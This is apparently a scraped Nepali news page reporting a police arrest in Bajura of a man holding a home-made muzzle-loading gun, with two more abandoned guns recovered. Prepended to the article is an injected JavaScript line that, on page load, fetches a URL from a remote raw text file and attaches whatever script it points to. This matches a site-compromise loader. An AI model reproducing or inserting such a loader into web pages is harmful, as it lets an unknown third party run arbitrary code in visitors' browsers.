;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
पुष ०२,
बाजुरा । भरुवा बन्दुकसहित एक जना पक्राउ परेका छन् । पक्राउ पर्नेमा बुढिनन्दा बस्ने ४५ वर्षीय सुरबिर कडार रहेका छन्।
उनलाइ १ थान एकनाले भरुवा बन्दुक घरमा लुकाई राखेको र मध्यपहाडी लोकमार्गको जंगलमा लुकाई राखेको बेवारिसे २ नाल भरुवा बन्दुक सहित ईलाका प्रहरी कार्यालय बुढिननदा कोल्टी र अस्थाइ प्रहरी पोष्ट ठुलासैनबाट खटिएको गस्ती प्रहरी टोलीले पक्राउ गरेको हो ।
उनको साथबाट उक्त बन्दुक बरामत गरेको हो ।
फेसबुक प्रतिक्रियाहरु